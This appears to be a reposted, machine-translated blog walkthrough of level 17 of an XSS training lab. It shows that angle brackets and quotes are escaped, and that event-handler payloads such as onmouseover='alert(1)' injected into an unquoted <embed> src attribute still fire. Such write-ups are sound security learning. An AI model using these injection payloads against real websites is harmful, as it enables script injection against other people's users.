当前位置:网站首页>level17

level17

2022-07-05 04:17:00 m0_ sixty-two million ninety-four thousand eight hundred and fo

 

( It should be opened in the website swf file )

Use the basic statement first , Look what's filtered 

?arg01=<script>alert('xss')</script>&arg02=<script>alert('xss')</script>

 < > It's escaped , and " It's also escaped

<embed> Tag is to introduce a swf file To browser side , And its src Attribute value is not added quotes , So don't close

Try this code directly 

onclick='alert(1)'

  Not filtered

  Firefox cannot display pictures , Using Sogou browser 

?arg01=a&arg02=123 onmousedown='alert(1)'

?arg01=a&arg02=123 onmouseover='alert(1)'

To add 123, Give Way a=123, Separate the code , Otherwise, you can't pop up

however οnclick='alert(1)'  Unable to pop up , do not know why

原网站

版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202140649469397.html

边栏推荐

猜你喜欢

随机推荐